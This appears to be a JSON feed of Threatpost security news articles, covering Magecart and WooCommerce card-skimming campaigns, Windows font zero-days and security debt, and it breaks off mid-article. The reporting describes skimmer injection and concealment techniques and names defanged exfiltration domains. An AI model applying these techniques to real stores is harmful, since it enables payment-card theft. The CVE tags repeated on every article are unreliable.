Can you go deeper into that?\n\n**CE:** Yeah, so \u2013 and some of these are going to seem obvious once you get once you talk about them \u2013 but it\u2019s actually different to have the data behind it and kind of show that that\u2019s the case. One was just scan frequency, right? So if you\u2019re scanning your applications, you know, once a year, or once a month, like that\u2019s not as good as once a day, or more often than that. And so, you know, we found the ones that are scanning more frequently, the most frequently, are fixing stuff about three times faster. And so the amount of security debt, it\u2019s not growing as much.\n\nWe also found that scan cadence matters a lot. So if you imagine over the course of a year, you could be scanning on a steady cadence, like either once a day or once a week or once a year, but at some steady pace, probably built up through some automation and you\u2019ve got some scripts to do whatever. And then you can imagine a different visual picture where you have this like flurry of scanning, right? Like a security sprint type activity, and then you do nothing for six months, and then you decide you\u2019re going to pay attention to it again. So you do this flurry of activity, and then you do nothing. And so we call that \u201cbursty.\u201d And so when you when you compare, like when you take every application that, you know, in the whole data set, and you map it against that, steady versus bursty versus irregular, you find that the steady ones actually do decrease their security debt over time, and the other ones get worse.\n\nSo it\u2019s not a problem that goes away immediately, it\u2019s a lot to deal with, it takes a lot of work to fix these, these coding issues. But you know, there are there are these factors that can make it easier to to overcome.\n\n**LO:** You also looked at vulnerabilities like cross site scripting, all the way up to authentication and misconfigurations. And so how did that relate to the concept of security debt, in terms of how long it was taking companies to patch certain vulnerabilities versus others?\n\n**CE:** Yeah we had a theory that higher severity vulnerabilities \u2013 so ones that were just like, had a higher impact if exploited \u2013 would be fixed faster. That seems reasonable. Or that higher criticality applications like for the business that says, \u201cWell, this applications like way more important business value wise than this other one,\u201d we expected that those, you know, those would be fixed faster. And it turns out that, you may have a little bit of speed improvement on, let\u2019s say, the higher severity versus the medium or low severity flaws, but not significantly. It wasn\u2019t nearly as impactful as the scan frequency and the scan cadence, which was interesting.\n\n**LO:** Yeah.\n\n**CE:** You know, you would just expect that intuitively, to work that way. And it turns out it doesn\u2019t. We looked at a number of factors that we thought might influence that, and it really didn\u2019t. And over the course \u2013 this is the tenth time we\u2019ve done this report \u2013 and, over the course of those years, we are continuing to see the same types of vulnerabilities crop up over and over again, right? They\u2019re not disappearing. If you looked at an individual organization, I think you\u2019d see a downward trend, but as companies are starting to scan more and more of their software that they have, and companies are starting to do security testing that maybe have never done it before, those companies that are improving, those companies that are new, are kind of averaging each other out, right? You still see, the cross site scripting, the SQL injections, and all the issues that we\u2019ve known about for decades.\n\n**LO:** Well, yeah, you mentioned that this is the tenth time done this report, so have you noticed any sort of shifts in terms of things getting better or getting worse or is it remaining the same?\n\n**CE:** You see slight declines in certain categories, especially the ones that are well known, tied to breaches, SQL injection, things like that. But it\u2019s still fairly prevalent. And again, that\u2019s still partly education, partly some applications never having been tested before. And so they\u2019ve got a lot of stuff piled up that that was never addressed. So as we get better with education, as we get better with, again, like better automation of scanning and incorporating it into the development lifecycle at all possible phases, shifting that left and actually, you know, fixing stuff before it gets so expensive to fix. I think we are going to see that get better.\n\n**LO:** Yeah, I mean, can you talk a little bit about patch management in general, and the complexities and challenges that companies are facing every day?\n\n**CE:** Specifically in the software space, what we see a lot of is just like open source use, right? So nobody\u2019s building applications from scratch, right? They\u2019re using open source libraries for a lot of that functionality. And so you may write 10 percent of the code yourself and you may be borrowing the other 90 percent for a new application. And so when you do that, that\u2019s great. You don\u2019t have to reinvent the wheel every time. But you also inherit a lot of the risk from those open source libraries.\n\nAnd what typically happens is you\u2019re developing a new product, you choose those libraries, you download them. And then whatever version those libraries were on at the time, that\u2019s the ones that you stick with it. So as you can imagine, over time, vulnerabilities are discovered in those libraries. And so the security of those libraries gets worse and worse and worse over time. So the patch management issue with regard to software is well, how much risk are these libraries now introducing, and when is the right time to patch those right? If something is is announced, and there\u2019s an exploit for it, I\u2019m suddenly vulnerable today, when yesterday I was fine. And I didn\u2019t make any changes to my software, right? I just, the ecosystem just got worse. So what will happen is companies will get further and further and further behind on those on those open source version patches. And the further you get behind, the harder it is to catch up, if you imagine going from version one to version two on something that\u2019s a lot easier than going from version one to version eight, because things break along the way. So that\u2019s the pattern you see is this inherited risk tends to grow over time. And that is essentially another form of security debt.\n\n**LO:** Right. And that makes it even more complicated, right, because you do have kind of, it\u2019s almost like out of your hands a little bit.\n\n**CE:** It is, things can change underneath you without you actually doing anything. And that\u2019s the sort of the part that\u2019s hard to wrap your head around, you don\u2019t control the risk entirely. You hope that something gets patched around the same time that a vulnerability is announced. But sometimes you\u2019re just left wide open. And you have to figure out a way to kind of code around that. So it\u2019s nearly we\u2019re paying a lot of attention to, the next version of the report that we\u2019re actually working on now. We\u2019re trying to drill in a lot more on the the open source and the third party stuff and and try and find some interesting tidbits that will hopefully tell us a little bit more about what\u2019s happening there.\n\n**LO:** Were there any other key takeaways that you wanted to highlight from this previous report especially looking into 2020?\n\n**CE:** I think, really, the takeaway for us is, you know, there\u2019s been a lot of tension, I think, between DevOps and security in the past, there\u2019s a notion that, well, DevOps is trying to move so quickly, and how can they possibly do that? Because where will the security happen? Right? And so some security professionals that haven\u2019t really kind of caught onto how DevOps is working are a little bit afraid of what that\u2019s going to do to the safety of their software.\n\nAt the same time, you want the developers to be able to create business value and like code and solve these problems confidently and put the software out there in a secure manner. So what we\u2019re finding especially with that scan cadence and scan frequency thing is that DevOps and security can actually coexist very nicely. And in fact, the practices that DevOps brings to software development actually are beneficial for security as well, that regularity that automation, the feedback loops. And so if you incorporate security in the right way, DevOps is actually a great opportunity to improve the way that you\u2019re doing software security. And so I think that\u2019s the big, the big takeaway.\n\n**LO:** Definitely something to keep an eye on. Well, Chris, thank you so much for joining us today at RSA to talk about your report and what you\u2019re seeing in terms of vulnerabilities and how they\u2019re being addressed.\n\n**CE:** My pleasure, nice talking to you.\n\n**LO:** Great. Thank you.\n", "cvss3": {}, "published": "2020-03-05T19:53:16", "type": "threatpost", "title": "Chris Eng: Patch Management Challenges Drive 'Security Debt'", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-24400", "CVE-2020-24407"], "modified": "2020-03-05T19:53:16", "id": "THREATPOST:81EBB25A8E63A83670A070DD550D9644", "href": "https://threatpost.com/chris-eng-patch-management-challenges-drive-security-debt/153471/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-15T22:29:38", "description": "In an interesting development on the financial cybercrime scene, different Magecart groups have been spotting stepping over each other and attacking the same sites.\n\nMagecart is an umbrella term encompassing several different threat groups who all use the same modus operandi: They compromise websites built on the Magento e-commerce platform in order to inject card-skimming scripts on checkout pages, stealing unsuspecting customers\u2019 payment card details and other information entered into the fields on the page.\n\nAccording to research from PerimeterX, multiple Magecart attacks are skimming credit cards from sites at the same time. These don\u2019t seem to be coordinated, according to the firm, given that each of the attacks were different in terms of the techniques used to compromise the target retailers.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nIdo Safruti, co-founder and CTO of PerimeterX, said in an email interview that the presence of multiple skimmers indicates that the Magecart groups are less affiliated with each other than many believe.\n\n\u201cFrom we\u2019ve learned so far, this is a cybercrime-as-a-service operation where multiple groups operate and breach websites, Magento-based and others, and they use different skimming kits purchased on the Dark Web,\u201d he told Threatpost. \u201cCybercriminals are taking advantage of any new opportunity. When a specific type of attack has been published or exposed and studied, many crime groups will try and take advantage of the new attack and the new techniques used in it.\u201d\n\n**Multiple Skimmer Discovery**\n\nIn researching recent Magecart attacks on clothing e-shop Sixth June that came to light last week, PerimeterX researchers found the Sixth June skimmed data being posted to a domain called mogento[dot]info, which was also hosting the skimmer. Scanning the web for other sites posting data to that same domain uncovered several other infected sites, including tubing-and-valve specialist PEXSuperstore.com. Further investigation showed that PEXSuperstore was also infected with a second Magecart skimmer \u2014 only this one was exfiltrating card data to https://assetstorage[dot]net/PEXSuperstore.com.\n\n\u201cThe two skimmers were completely different from each other in terms of code, obfuscation level and complexity,\u201d explained PerimeterX research lead Mickey Alton, [in a posting on Monday](<https://www.perimeterx.com/blog/multiple-magecart-groups-attacking-simultaneously/>). \u201cBut, both attacks targeted Magento-based sites and used similar methods of code injection, and served malicious first-party code to unsuspecting users.\u201d\n\nMore specifically, the Sixth June attacker directly compromised the PEXSuperstore website (e.g., used \u201cfirst-party code\u201d), with a decoy code snippet that masqueraded as a Google Analytics script. The decoy script then pulled in an obfuscated snippet that loaded the skimmer from a remote server controlled by the attacker. The second Magecart attacker on the other hand compromised the website by simply modifying the website\u2019s own script related to the checkout process, injecting skimming code at the bottom of the original script.\n\n\u201cThis skimmer was on the checkout page sniffing users\u2019 [personally identifiable information] PII data and sending post requests to assetstorage[dot]net,\u201d wrote Alton. \u201cWhen placing an order, the compromised first-party checkout script is called and executes the skimmer\u2026.we can only surmise that the web server security controls were bypassed to make changes to the website.\u201d\n\nThe second skimmer host,assetstorage[dot]net, was found to be related to a much larger campaign, with the same MO used to target sportswear giant UmbroBrasil and other lesser-known websites.\n\nIt also appears that the double-dipping isn\u2019t intentional; PerimeterX researchers surmised that the Magecart groups are likely running attack campaigns simultaneously without realizing it.\n\n\u201cIn recent years the cybercrime world has evolved much like the software and cloud world has evolved with many groups offering services to perform specific tasks \u2013 like infecting a server, loading a payload, or providing a specific payload to carry an attack,\u201d Safruti told Threatpost. \u201cThis is why we see more attacks using identical mechanisms and potentially multiple attackers infecting the same breached site(s), similar to the fact that many competing startups may be running their services on the same cloud vendor, and using the same open-source libraries.\u201d\n\nMagecart, in operation since 2015, is a collection of groups that have been blamed for an array of high-profile breaches \u2013 from [Ticketmaster](<https://threatpost.com/ticketmaster-breach-just-one-part-of-a-wide-ranging-campaign/133892/>) to [British Airways](<https://threatpost.com/magecart-group-pinned-in-recent-british-airways-breach/137338/>). Skimmers be injected directly into websites (as is the case with First Aid Beauty), or through compromised third-party suppliers used by sites.\n\nMore recently, in August it was [disclosed](<https://threatpost.com/magecart-ecommerce-card-skimming-bonanza/147765/>) that more than 80 global eCommerce sites were actively compromised by Magecart groups, while a September report found that [a faction](<https://threatpost.com/magecart-group-targets-routers-behind-public-wi-fi-networks/148662/>) of the Magecart threat group is testing code that targets routers used to provide free or paid Wi-Fi services in public spaces and hotel.\n\n_**What are the top mistakes leading to data breaches at modern enterprises? Find out: Join an expert from SpyCloud and Threatpost senior editor Tara Seals on our upcoming free **_[_**Threatpost webinar**_](<https://attendee.gotowebinar.com/register/3127445778613605890?source=ART>)_**, \u201cTrends in Fortune 1000 Breach Exposure.\u201d **_[_**Click here to register**_](<https://attendee.gotowebinar.com/register/3127445778613605890?source=ART>)_**.**_\n", "cvss3": {}, "published": "2019-11-04T22:17:33", "type": "threatpost", "title": "Magecart Groups Attack Simultaneous Sites in Card-Theft Frenzy", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-24400", "CVE-2020-24407"], "modified": "2019-11-04T22:17:33", "id": "THREATPOST:75F9985EEED2523C6C65016DB1C5630A", "href": "https://threatpost.com/magecart-groups-attack-simultaneous-sites-in-card-theft-frenzy/149872/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-15T22:26:17", "description": "Concerned global citizens making donations to help fight the [massive Australia bushfires](<https://www.cbsnews.com/news/australia-fires-firefighters-team-up-with-americans-to-fight-bushfires/>) have been caught up in a Magecart attack, after one of the groups implanted a payment-card skimmer on the check-out page of a legitimate online donation site.\n\nResearchers [ran across](<https://twitter.com/MBThreatIntel/status/1215693928764063744>) the Magecart script, named \u201cATMZOW\u201d after one of the strings in the code, stealing form data from the checkout page of the site. This included the payment-card data itself (name on card, number, expiry and CVV) as well as additional personal information such as name and billing address.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nJ\u00e9r\u00f4me Segura, director of threat intelligence at Malwarebytes, told Threatpost that this particular script uses typical obfuscation but also has some anti-debugging tricks. It infected the site via its e-commerce platform, which he said hadn\u2019t been patched or updated in a while.[](<https://media.threatpost.com/wp-content/uploads/sites/103/2020/01/14150623/bushfire.png>)\n\n\u201cThe compromised site is running Magento, by far the most targeted CMS when it comes to skimming, and was outdated, which is likely how the attackers were able to inject it with malware,\u201d he said in an email interview. \u201cWe don\u2019t believe this site was targeted on its own, but rather was victim of an automated attack based on exploiting known vulnerabilities. This reinforces the idea that any site, big or small, business or not for profit, is a valuable resource for criminals.\u201d\n\nSegura declined to name the affected site (but said that it was informed of the problem and that the malicious code \u201chas been removed from the site as we speak\u201d). However, researchers traced the skimmer back to its control panel, a known exfiltration domain at vamberlo[.]com.\n\n\u201cThe same ATMZOW script had already been injected into dozens of other websites before this one and using the same exfiltration domain as well,\u201d Segura told Threatpost.\n\nTroy Mursch of Bad Packets Report said [via tweet](<https://twitter.com/bad_packets/status/1215726048769273856>) that the PublicWWW tool indeed shows that ATMZOW is active on 39 other websites, and posted a screenshot:\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2020/01/14151505/magecart-sites.png>)\n\n[Magecart](<https://threatpost.com/magecart-blue-bear-attack/151585/>) is an umbrella term encompassing several different threat groups who typically use the same modus operandi. They compromise websites by exploiting vulnerabilities in third-party e-commerce platforms, in order to inject card-skimming scripts on checkout pages.\n\nAt Virus Bulletin last October, researchers at RiskIQ said that Magecart is now so ubiquitous that its infrastructure [is flooding the internet](<https://threatpost.com/magecart-infestations-saturate-web/148911/>). There are at least 570+ known command-and-control (C2) domains for the group, with close to 10,000 hosts actively loading those domains, researchers said.\n\nEven so, Segura told Threatpost that this could be the tip of the iceberg.\n\n\u201cClient-side web skimmers have become well documented over the past couple of years,\u201d he said. \u201cHowever, what we read about is probably only a small fraction of the total number of active compromises. In particular, we rarely ever hear about skimmers that work server-side because only very few companies/researchers are able to get visibility into these breaches.\u201d\n\n_**Concerned about mobile security? **_[**Check out our free Threatpost webinar,**](<https://attendee.gotowebinar.com/register/7679724086205178371?source=art>) _**Top 8 Best Practices for Mobile App Security**__**, on Jan. 22 at 2 p.m. ET. **_**_Poorly secured apps can lead to malware, data breaches and legal/regulatory trouble. Join our experts to discuss the secrets of building a secure mobile strategy, one app at a time._** [_**Click here to register**_](<https://attendee.gotowebinar.com/register/7679724086205178371?source=art>)_**.**_\n", "cvss3": {}, "published": "2020-01-14T20:39:35", "type": "threatpost", "title": "Card Skimmer Hits Australian Bushfire Donation Site", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-24400", "CVE-2020-24407"], "modified": "2020-01-14T20:39:35", "id": "THREATPOST:91C088C13F7384C96414B2C00FAF909B", "href": "https://threatpost.com/card-skimmer-australian-bushfire-donation-site/151841/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-15T22:17:10", "description": "Since its launch three years ago, the Keeper threat group has compromised more than 570 e-commerce websites, from online liquor stores to Apple product resellers. And experts warn of future, increasingly sophisticated attacks against online merchants worldwide.\n\nThe Keeper group, a faction of the [Magecart umbrella](<https://threatpost.com/tag/magecart/>), consists of an interconnected network of 64 attacker domains and 73 exfiltration domains. Researchers recently uncovered an unsecured access log on the Keeper control panel harboring 184,000 compromised payment cards, which had time stamps that ranged from July 2018 to April 2019.\n\n\u201cExtrapolating the number of cards per nine months to Keeper\u2019s overall lifespan, and given the dark-web median price of $10 per compromised card-not-present (CNP) card, this group has likely generated upwards of $7 million USD from selling compromised payment cards,\u201d according to [new research](<https://geminiadvisory.io/keeper-magecart-group-infects-570-sites/>) from Gemini Advisory on Tuesday.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nAs is common for [Magecart groups](<https://threatpost.com/magecart-groups-attack-simultaneous-sites-in-card-theft-frenzy/149872/>), Keeper attackers launched attacks by breaking into online store backends, altering their source code and inserting malicious scripts that log payment-card details entered by shoppers in checkout forms. Researchers say Keeper exfiltration and attacker domains use identical login panels and are all linked to the same dedicated server. This server hosts both the malicious payload and the exfiltrated data stolen from victim sites, they said.\n\n\u201cThe Gemini team has named this group \u2018Keeper\u2019 based on its repeated usage of a single domain called fileskeeper[.]org to inject malicious payment card-stealing JavaScript (JS) into the website\u2019s HTML code, as well as receive compromised card data,\u201d said researchers.\n\n## **Victimology**\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2020/07/07151730/keeper-magecart.png>)\n\nClick to Expand\n\nThe 570 victim e-commerce stores range from small boutique shops to top sites in the Alexa Global Rankings, receiving between 500,000 to 1 million visitors monthly. Examples include an India-based online jewelry store (ejohri[.]com), a U.S. based premier wine and spirits seller (cwspirits[.]com) and an Indonesia-based Apple product reseller (ibox.co[.]id).\n\nAlso of note, more than 85 percent of the victim sites operated on the Magento CMS. Magento is known to be the [top target for Magecart attacks](<https://threatpost.com/magento-warns-upgrade-asap/150115/>), and has more than 250,000 users worldwide. Magento 1 reached [end-of-life last week](<https://threatpost.com/tuesdays-magento-1-eol-100k-online-stores/157000/>), with Adobe making a last-ditch effort to urge the 100,000 online stores still running the outdated version to migrate to Magento 2 or face potential targeting from Magecart and other threat groups. Other CMS platforms that were hit by Keeper\u2019s campaign included sites using WordPress (5.5 percent), Shopify (4.2 percent), BigCommerce (2 percent) and PrestaShop (0.5 percent) sites.\n\nThese victims may have been \u201coperating on an outdated content management system (CMS), utilizing unpatched add-ons, or having administrators\u2019 credentials compromised through sequel injections,\u201d said researchers.\n\n## **Changing Tactics**\n\nResearchers warned that Keeper appears to be continually updating its tactics and techniques, helping it to skirt detection. For instance, one of the initial attacks launched in April 2017, against retailer dressedinwhite[.]com, utilized public obfuscation methods, which made it simple to decode. Starting in 2018, however, the threat actors began to use custom obfucscation methods, as seen in an attack against casterdepot[.]com, researchers said.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2020/07/07151921/keeper-magecart-2.png>)\n\nClick to Expand.\n\nA more recent campaign in 2019 against nomin[.]net also shows a modified script that appears to be much cleaner and more concise with no displayed line breaks, said researchers.\n\n\u201cThe Keeper group currently uses this format for its payloads and denotes specific payment card, billing address and additional information fields that it collects,\u201d researchers said.\n\nGoing forward, researchers warn that in mid-2020, Magecart attacks have become a daily occurrence for small to medium-sized e-commerce businesses, from [food sites](<https://threatpost.com/olympic-ticket-survival-sites-hit-by-cyberattack/152648/>) to [large retailers like Macy\u2019s](<https://threatpost.com/macys-data-breach-linked-to-magecart/150393/>). More recently, sophisticated hackers like [the Lazarus Group](<https://threatpost.com/lazarus-group-adds-magecart/157167/>) have started adding digital payment-card skimming to their repertoire [using Magecart code](<https://threatpost.com/8-city-gov-websites-magecart/156954/>). Researchers predict that in the future, Keeper will continue its attacks.\n\n\u201cBased on this pattern of successful Magecart attacks, Gemini assesses with high confidence that Keeper is likely to continue launching increasingly sophisticated attacks against online merchants across the world,\u201d they said.\n\n**_BEC and enterprise email fraud is surging, but DMARC can help \u2013 if it\u2019s done right. On July 15 at 2 p.m. ET, join Valimail Global Technical Director Steve Whittle and Threatpost for a [FREE webinar](<https://attendee.gotowebinar.com/register/441045308082589963?source=art>), \u201cDMARC: 7 Common Business Email Mistakes.\u201d This technical \u201cbest practices\u201d session will cover constructing, configuring, and managing email authentication protocols to ensure your organization is protected. [Click here to register](<https://attendee.gotowebinar.com/register/441045308082589963?source=art>) for this Threatpost webinar, sponsored by Valimail._**\n", "cvss3": {}, "published": "2020-07-07T20:05:08", "type": "threatpost", "title": "Keeper Threat Group Rakes in $7M from Hundreds of Compromised E-Commerce Sites", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-24400", "CVE-2020-24407"], "modified": "2020-07-07T20:05:08", "id": "THREATPOST:507909D943303F221572F2B4F6F0CCAC", "href": "https://threatpost.com/keeper-threat-group-7m-e-commerce-sites/157235/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-15T22:21:40", "description": "Credit-card-stealing criminals have set their sights on the WordPress plugin known as WooCommerce, an e-tailer platform, with a JavaScript-based card-skimming malware.\n\nSucuri researcher Ben Martin recently investigated a skimmer attack lodged against a WooCommerce site and found that it differs from prior payment-card campaigns that have targeted WordPress-based e-commerce destinations \u2014 in that the malware doesn\u2019t just intercept payment information entered into the fields on a check-out page.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201c[Attacks on WooCommerce in the past have] typically been limited to modifications of payment details within the plugin settings,\u201d he explained in a [Thursday posting](<https://blog.sucuri.net/2020/04/analysis-of-a-wordpress-credit-card-swiper.html>). \u201cFor example, forwarding payments to the attacker\u2019s PayPal email instead of the legitimate website owner. Seeing a dedicated credit card swiping malware within WordPress is something fairly new.\u201d\n\n**[](<https://media.threatpost.com/wp-content/uploads/sites/103/2020/04/10172927/WooCommerce-4.0.jpg>)Behind the Scenes**\n\nAfter scanning the infected website, where customers had complained of fraudulent transactions, nothing serious at first seemed amiss, Martin wrote. It took a deeper integrity check of the core files of the site in order to find the stealer.\n\nRather than simply injecting malicious, third-party code \u2013 the typical approach used by Magecart and other groups \u2013 the attackers in this attack modified a normally benign JavaScript file that is intentionally used on the site.\n\n\u201cIt was lodged near the end of a JQuery file: ./wp-includes/js/jquery/jquery.js,\u201d the researcher explained, \u201cinserted before the ending jQuery.noConflict();.\u201d\n\nHe added, \u201cIt\u2019s not so easy to see. The fact that the malware lodged itself within an already existing and legitimate file makes it a bit harder to detect.\u201d\n\nThe part of the script used to actually harvest the card details was found in the \u201c./wp-includes/rest-api/class-wp-rest-api.php\u201d file, according to Martin. It behaves like other PHP malware, he said.\n\n\u201cAs is typical in PHP malware, several layers of encoding and concatenation are employed in an attempt to avoid detection and hide its core code from the average webmaster,\u201d he wrote.\n\nOnce it\u2019s scooped up the payment details, the malicious script saves both the payment-card numbers and CVV card security codes in plain text in the form of cookies. It then uses the legitimate file_put_contents function to collect them into two separate image files (a .PNG file and a JPEG). These are kept in the wp-content/uploads directory structure, the researcher said.\n\nIn his investigation, Martin found the image files to be empty of stolen data \u2013 suggesting that, potentially, \u201cthe malware had the ability to cover its own tracks and auto-cleared these files after the information had been acquired by the attackers,\u201d according to his writeup.\n\n**WordPress Skimmers: A Growing Trend**\n\nWhile well-known card-thieving groups [like Magecart](<https://threatpost.com/emerging-makeframe-skimmer-magecart-smbs/154374/>) typically target e-commerce sites that run on the [Magento platform](<https://threatpost.com/critical-flaws-magento-ecommerce-code-execution/152343/>), WooCommerce has recently become the [market leader](<https://barn2.co.uk/woocommerce-stats/>) for e-commerce platforms, Martin pointed out. And that has, naturally, piqued the attention of cybercriminals looking for new attack surfaces.\n\n\u201cWith WooCommerce recently overtaking all other ecommerce platforms in popularity it was only a matter of time before we started seeing attackers target this platform more frequently,\u201d he said.\n\nHe said that this was the first case of this kind of WordPress-targeted card-skimming malware that he came across, but that a handful more have appeared since, and that \u201cWordPress websites with e-commerce features and online transactions will almost certainly continue to be targeted going forward.\u201d\n\nGiven that attackers are able to compromise websites in any number of ways \u2014 exploiting a [known vulnerable plugin](<https://threatpost.com/wordpress-plugin-bug-popup-builder/153715/>), for instance, or via a [brute-forced admin account](<https://threatpost.com/hackers-using-brute-force-attacks-harvest-wordpress-sites-041513/77730/>) \u2013 a good approach to protecting WooCommerce and other WordPress-based websites from skimmers and other malware is to disable direct file editing for wp-admin, according to Martin.\n\n\u201c[Add the following line to your wp-config.php file: define( \u2018DISALLOW_FILE_EDIT\u2019, true );,\u201d he said. \u201cThis even prevents administrator users from being able to directly edit files from the wp-admin dashboard. In the event of a compromised admin account this can make the difference between the attacker delivering their payload or not.\u201d\n\n**_Worried about your cloud security in the work-from-home era? On _****_April 23 at 2 p.m. ET_****_, join DivvyCloud and Threatpost for a FREE webinar, _**[**_A Practical Guide to Securing the Cloud in the Face of Crisis_**](<https://attendee.gotowebinar.com/register/4136632530104301068?source=art>)**_. Get exclusive research insights and critical, advanced takeaways on how to avoid cloud disruption and chaos in the face of COVID-19 \u2013 and during all times of crisis. _**[**_Please register here_**](<https://attendee.gotowebinar.com/register/4136632530104301068?source=art>)_** for this sponsored webinar.**_\n", "cvss3": {}, "published": "2020-04-10T21:37:37", "type": "threatpost", "title": "WooCommerce Falls to Fresh Card-Skimmer Malware", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-24400", "CVE-2020-24407"], "modified": "2020-04-10T21:37:37", "id": "THREATPOST:A8F8FF80F526883F7B2F0AB15005FF18", "href": "https://threatpost.com/woocommerce-card-skimmer-malware/154699/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-15T22:22:29", "description": "Microsoft is warning of critical zero-day flaws in its Windows operating system that could enable remote code execution. The unpatched flaws are being exploited by attackers in \u201climited, targeted\u201d attacks, the company said.\n\nAccording to Microsoft, two remote code execution vulnerabilities exist in the way that Windows\u2019 Adobe Type Manager Library handles certain fonts. Adobe Type Manager is a font management tool built into both Mac OS and Windows operating systems, and produced by Adobe. While no patches are available for the flaws, workaround mitigations can protect users.\n\n\u201cMicrosoft is aware of limited targeted attacks that could leverage unpatched vulnerabilities in the Adobe Type Manager Library, and is providing the following guidance to help reduce customer risk until the security update is released,\u201d according to a Monday Microsoft [security advisory](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/adv200006#ID0EMGAC>).\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nSpecifically, the flaw exists because the Windows version of Adobe Type Manager Library improperly handles a specially-crafted multi-master font (called the Adobe Type 1 PostScript format). [Type 1 vector outline fonts](<https://www.adobe.com/products/type/adobe-type-references-tips/font-formats.html>) are a specialized form of PostScript (the worldwide printing and imaging standard), which contain instructions for building outlines from scaleable lines and curves (filled to create the solid shapes of letters and other glyphs), according to Adobe.\n\n> Microsoft is aware of limited targeted attacks that could leverage unpatched vulnerabilities in the Adobe Type Manager Library, and is providing guidance to help reduce customer risk until the security update is released. See the link for more details. <https://t.co/tUNjkHNZ0N>\n> \n> \u2014 Security Response (@msftsecresponse) [March 23, 2020](<https://twitter.com/msftsecresponse/status/1242135309116043270?ref_src=twsrc%5Etfw>)\n\nThere are multiple ways an attacker could exploit the vulnerabilities, Microsoft said. For example, an attacker could convince a user to open a specially crafted document or view it in the Windows Preview pane. Windows Preview pane is used by the Windows Explorer (which is called File Explorer in Windows 10) file manager application to preview pictures, video, and other content.\n\nAll currently-supported versions of Windows are affected, including Windows 10, as well as versions of Windows 7, Windows 8.1, Windows RT, Windows Server 2008, Windows Server 2012, Windows Server 2016 and Windows Server 2019 (a full list of affected versions can be [found in the advisory](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/adv200006#ID0EUGAC>)). Windows 7 is also affected, though it has reached end of support, said Microsoft.\n\n**Workarounds **\n\nWhile no patches are available yet, Microsoft recommended a slew of mitigations and workarounds. That includes disabling the preview pane and details pane in Windows. Blocking this would mean that Windows Explorer (or File Explorer in Windows 10) will not automatically display OpenType fonts.\n\n\u201cDisabling the Preview and Details panes in Windows Explorer prevents the automatic display of OTF fonts in Windows Explorer,\u201d said Microsoft. \u201cWhile this prevents malicious files from being viewed in Windows Explorer, it does not prevent a local, authenticated user from running a specially crafted program to exploit this vulnerability.\u201d\n\nOther workarounds include disabling the WebClient service. Microsoft said that disabling this service blocks the Web Distributed Authoring and Versioning (WebDAV) client service, which is a \u201clikely remote attack vector.\u201d WebDAV is an HTTP extension that allows clients to perform remote Web content authoring operations.\n\n\u201cAfter applying this workaround it is still possible for remote attackers who successfully exploit this vulnerability to cause the system to run programs located on the targeted user\u2019s computer or the Local Area Network (LAN), but users will be prompted for confirmation before opening arbitrary programs from the Internet,\u201d said Microsoft.\n\nAnother workaround is renaming ATMFD.DLL (the file name of Adobe Type Manager Font Driver), said Microsoft. The company also noted that for systems running supported versions of Windows 10, a successful attack could only result in code execution within an AppContainer sandbox context with limited privileges and capabilities.\n\nMicrosoft said it is currently working on a fix and that a patch would likely come during its regularly scheduled Patch Tuesday updates (scheduled for April 14).\n\n\u201cUpdates that address security vulnerabilities in Microsoft software are typically released on Update Tuesday, the second Tuesday of each month,\u201d according to Microsoft. \u201cThis predictable schedule allows for partner quality assurance and IT planning, which helps maintain the Windows ecosystem as a reliable, secure choice for our customers.\u201d\n\n_**Do you suffer from Password Fatigue? On [Wednesday April 8 at 2 p.m. ET](<https://attendee.gotowebinar.com/register/7732731543372035596?source=art>) join **_**_Duo Security and Threatpost as we explore a [passwordless](<https://attendee.gotowebinar.com/register/7732731543372035596?source=art>) future. This [FREE](<https://attendee.gotowebinar.com/register/7732731543372035596?source=art>) webinar maps out a future where modern authentication standards like WebAuthn significantly reduce a dependency on passwords. We\u2019ll also explore how teaming with Microsoft can reduced reliance on passwords. [Please register here](<https://attendee.gotowebinar.com/register/7732731543372035596?source=art>) and dare to ask, \u201c[Are passwords overrated?](<https://attendee.gotowebinar.com/register/7732731543372035596?source=art>)\u201d in this sponsored webinar. _**\n", "cvss3": {}, "published": "2020-03-23T18:27:40", "type": "threatpost", "title": "Microsoft Warns of Critical Windows Zero-Day Flaws", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-24400", "CVE-2020-24407"], "modified": "2020-03-23T18:27:40", "id": "THREATPOST:5D03069AA1C13F3368E88C9D30D3CC23", "href": "https://threatpost.com/microsoft-warns-of-critical-windows-zero-day-flaws/154040/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-15T22:15:55", "description": "Critical flaws in the [popular Meetup ](<https://threatpost.com/critical-meetup-website-flaws-takeover-payment-theft/157934/>)platform were revealed Monday as part of research unleashed at this week\u2019s [Black Hat USA 2020](<https://threatpost.com/black-hat-usa-def-con-28-go-virtual/155606/>). The flaws, which have been patched, enable the full takeover of Meetup \u201cGroups\u201d by threat actors, who can also redirects payments and carryout other malicious actions.\n\nErez Yalon, the director of security research with Checkmarx, discussed why these critical vulnerabilities are a \u201choly grail\u201d for attackers, and explained how the bugs are indicative of overall application security trends that will be discussed this week at Black Hat USA 2020. In the case of the Meetup flaws, the researcher identified two. One is a [cross site scripting flaw](<https://threatpost.com/wordpress-xss-drive-by-code-execution/148324/>) and the second a [cross site request 